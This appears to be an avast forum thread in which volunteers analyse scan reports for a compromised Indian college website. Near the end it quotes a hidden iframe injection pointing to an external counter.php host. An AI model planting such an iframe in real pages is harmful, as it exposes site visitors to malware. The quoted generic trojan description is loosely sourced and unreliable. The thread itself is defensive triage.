What exactly?

see: http://app.webinspector.com/public/reports/24841007
Given as TrojWare.JS.Iframe.GJ
Site vuln for fmcarbscollegedot in see: Custom errors: Fail
Requested URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Response URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Page title: A potentially dangerous Request.QueryString value was detected from the client (foo=“”). | HTTP status code: 500 (Internal server error) | Response size: 6,690 bytes | Duration: 316 ms
and
Stack trace: Fail
Requested URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Response URL: htxp://fmcarbscollege.in/fmcarbscollege.in/(S(k4gsld55axnunf45uxnvfe45))/Default1.aspx?access=denied&ReturnUrl=/fmcarbscollege.in/trace.axd&foo= | Page title: A potentially dangerous Request.QueryString value was detected from the client (foo=“”). | HTTP status code: 500 (Internal server error) | Response size: 6,690 bytes | Duration: 316 ms
Excessive headers warning:
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Clickjacking: Warning
Requested URL: htxp://fmcarbscollege.in/ | Response URL: htxp://fmcarbscollege.in/ | Page title: Raja Balwant Singh Management Technical Campus (Formerly FMCA) | HTTP status code: 200 (OK) | Response size: 20,301 bytes | Duration: 1,262 ms
Netcraft halts and reports Phishing, avast does not detect yet!
Very poort WOT web rep two reds.

pol

General Info Website: http://fmcarbscollege.in Domain: fmcarbscollege.in Scanned IP: 182.50.130.121 Country: Singapore

Seems like a indian writer down in singapore…

see: http://zulu.zscaler.com/submission/show/497df73973baed7d558eda04451e19d4-1407255491

suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
fmcarbscollege.in/ie.js benign
[nothing detected] (script) fmcarbscollege.in/ie.js
status: (referer=fmcarbscollege.in/)saved 381 bytes bcbbd9dc3f2ddfeefac0bb8ce0d65d49a79f63e3
info: [decodingLevel=0] found JavaScript
suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
file: bcbbd9dc3f2ddfeefac0bb8ce0d65d49a79f63e3: 381 bytes
file: 8c4a1bc41c4c7048b6ef04c8fa985ba047d265bf: 581 bytes
file: b99ea47d93c6b2585e05b3fc053f4ebc85b4d97d: 587 bytes

I cant pick up anything here:
https://www.virustotal.com/en/file/87d24990b6b7bcc3609e2c67bdcada4021a16749ced95c5dcae896d07c13d0d8/analysis/1409583429/
https://www.virustotal.com/en/file/358c01733613975fcf3c6325b050ad3e76c44524bdbba932ffae3c60513f896d/analysis/1409583443/

Multiple threats detected:
GMT
htxp://fmcarbscollege.in/download/form_1.pdf on 08/05/2014 at 16:18 GMT
htxp://fmcarbscollege.in/download/form_2.pdf on 08/05/2014 at 16:18 GMT
fmcarbscollege.in/a7.swf <<SWF:Malware-gen

Avast should be detecting this as JS:Pdfka[trj] and swf:malware-gen

Reported to virus AT avast DOT com

Here I only get a blacklisting history of that site:
http://urlquery.net/report.php?id=1409594630772
Last scan does not give it as malicious. Earlier ones as blacklisted and with malware.

TrojWare.JS.Iframe.GJ belongs to a high level risk Trojan horse which is nasty to damage system files. It is very crafty virus that it can remain on all Windows operating systems. Mostly, the virus is distributed via suspicious links from social network or spam email attachment. Covered by the rootkit tactic, TrojWare.JS.Iframe.GJ can bypass antivirus programs and remain on computer deeply.

Virus associated files:

C:\Users[Account Name][Random].dat
%Userprofile%[Random].dat
%Homepath%[Random].dat
%Temp%\random.exe
C:\Windows\Trojan.Agent.Gen[Random].exe
%Windir%\Trojan.Agent.Gen[Random].exe
%Systemroot%\Trojan.Agent.Gen[Random].exe

Quote source: MiTechMate blog

pol

Pol,

I got a reply from avast labs.According to Jan,both the pdf and swf files are benign.Any ideas?

Except for the blacklisting I get no malicious activity from there.
Just check the external links:
-http://www.rediffmailpro.com/mail_pro/mail_pro.html → ‘mail login ’
-http://www.ugc.ac.in/page/videos-regarding-ragging.aspx → ‘more…’
-http://www.ugc.ac.in/ragging.pdf → ’ anti ragging d’

I get a suspicious file here: /default1.aspx
Severity: Suspicious
Reason: Detected hidden reference to external web resource. [What’s this?]
Details: Detected hidden iframe tag to ‘extremeplanet.pl’
Offset: 5921 flagged by Quttera’s which avast Webshield flags as infested with JS:Iframe-DOI[Trj].


[[<iframe src="htxp://extremeplanet.pl/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>]]

Same campaign as infested here: http://maldb.com/premiersoftservices.com/

polonus

For an update on this scan, see my scan here of Dec. 13th of the year 2014: https://forum.avast.com/index.php?topic=162966.msg1162365#msg1162365

Damian